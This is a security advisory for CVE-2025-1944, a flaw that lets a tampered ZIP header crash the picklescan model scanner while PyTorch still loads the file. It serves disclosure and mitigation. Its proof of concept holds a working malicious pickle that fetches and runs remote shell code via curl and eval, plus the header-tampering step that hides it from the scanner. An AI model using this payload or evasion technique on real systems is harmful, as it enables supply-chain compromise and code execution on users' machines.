CVE-2025-1944
Summary
picklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that causes it to crash when attempting to extract and scan PyTorch model archives. By modifying the filename in a ZIP entry's local file header while keeping the original filename in the central directory, an attacker can make PickleScan raise a BadZipFile error. However, PyTorch's more forgiving ZIP implementation still allows the model to be loaded, enabling malicious payloads to bypass detection.
Severity rating & weakness enumeration
Rating: Medium - 5.3
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L
CWE-358: Improperly Implemented Security Check for Standard
Description
Python's built-in zipfile module performs strict integrity checks when extracting ZIP files. If a filename stored in the ZIP header does not match the filename in the directory listing, zipfile.ZipFile.open() raises a BadZipFile error. PickleScan relies on zipfile to extract and inspect the contents of PyTorch model archives, making it susceptible to this manipulation.
PyTorch, on the other hand, has a more tolerant ZIP handling mechanism that ignores these discrepancies, allowing the model to load even when PickleScan fails. An attacker can exploit this behavior to embed a malicious pickle file inside a model archive, which PyTorch will load, while preventing PickleScan from scanning the archive.
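For illustration, here is a minimal, self-contained sketch of the strict check described above (the file name demo.zip is hypothetical): tampering with only the local file header copy of a member name is enough to make zipfile refuse an entry that the central directory still lists.
import zipfile

# Create a small archive containing a single member named "data.pkl"
with zipfile.ZipFile("demo.zip", "w") as zf:
    zf.writestr("data.pkl", b"placeholder")

# Overwrite the filename stored in the local file header only; the copy in
# the central directory (written at the end of the archive) still says "data.pkl"
with open("demo.zip", "r+b") as f:
    blob = f.read()
    f.seek(blob.find(b"data.pkl"))  # first occurrence = local file header
    f.write(b"datap.kl")

# Reading the member now fails, because zipfile compares the two names
with zipfile.ZipFile("demo.zip") as zf:
    try:
        zf.read("data.pkl")
    except zipfile.BadZipFile as exc:
        print("zipfile rejected the entry:", exc)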
Proof-of-Concept (PoC)
The following example demonstrates how a crafted ZIP archive can bypass Picklescan's security scan while still being loaded by PyTorch, executing the malicious payload:
import os
import torch

class RemoteCodeExecution:
    def __reduce__(self):
        return os.system, ("eval \"$(curl -s http://localhost:8080)\"",)

model = RemoteCodeExecution()
file = "does_not_scan_but_opens_in_torch.pth"
torch.save(model, file)

# Modify the local file header so the ZIP file raises an exception in picklescan
with open(file, "rb") as f:
    data = f.read()

# Replace only the first occurrence of "data.pkl" with "datap.kl"
modified_data = data.replace(b"data.pkl", b"datap.kl", 1)

# Write back the modified content
with open(file, "wb") as f:
    f.write(modified_data)

# Load the infected model; the payload executes via __reduce__ during unpickling
torch.load(file)
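As a quick check (a sketch that assumes the tampered archive produced by the PoC above), attempting to read the archive with Python's zipfile, which picklescan relies on internally, now fails for the renamed entry, while the torch.load call above still executes the payload:
import zipfile

path = "does_not_scan_but_opens_in_torch.pth"  # tampered archive from the PoC
with zipfile.ZipFile(path) as zf:
    for name in zf.namelist():
        try:
            zf.read(name)
        except zipfile.BadZipFile as exc:
            print(f"scan aborts on {name}: {exc}")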
Impact
- Who is impacted? Any organization or individual using PickleScan to detect malicious pickle files in PyTorch models.
- What is the impact? Attackers can embed malicious payloads inside PyTorch model archives while preventing PickleScan from scanning them.
- Potential Exploits: This technique can be used in supply chain attacks to distribute backdoored models via platforms like Hugging Face.
Mitigations
- Use a More Tolerant ZIP Parser: PickleScan should handle minor ZIP header inconsistencies more gracefully instead of failing outright (a sketch follows this list).
- Detect Malformed ZIPs: Instead of crashing, PickleScan should log warnings and attempt to extract valid files.
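As an illustration of these mitigations, here is a minimal sketch (not picklescan's actual implementation; the helper names read_member_tolerantly and iter_members are hypothetical) of an extraction path that trusts the central directory, logs a warning on a malformed entry, and falls back to parsing the local file header manually when the stored names disagree:
import struct
import zipfile
import zlib

def read_member_tolerantly(path: str, info: zipfile.ZipInfo) -> bytes:
    # Trust the central directory entry and ignore a mismatched filename
    # in the local file header (illustrative sketch only).
    with open(path, "rb") as f:
        f.seek(info.header_offset)
        header = f.read(30)                       # fixed-size local file header
        if header[:4] != b"PK\x03\x04":
            raise zipfile.BadZipFile("missing local file header signature")
        name_len, extra_len = struct.unpack("<HH", header[26:30])
        f.seek(info.header_offset + 30 + name_len + extra_len)
        raw = f.read(info.compress_size)
    if info.compress_type == zipfile.ZIP_STORED:
        return raw
    return zlib.decompress(raw, -15)              # raw DEFLATE stream

def iter_members(path: str):
    # Yield (name, bytes) for each member, warning instead of aborting
    # the whole scan when a single entry is malformed.
    with zipfile.ZipFile(path) as zf:
        for info in zf.infolist():
            try:
                yield info.filename, zf.read(info)
            except zipfile.BadZipFile as exc:
                print(f"warning: {info.filename!r} has a malformed header ({exc}); "
                      "falling back to central-directory offsets")
                yield info.filename, read_member_tolerantly(path, info)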
Note: picklescan version 0.0.23 contains a fix for this issue; users should upgrade to that version or later.
Credits
Trevor Madge (@madgetr) of Sonatype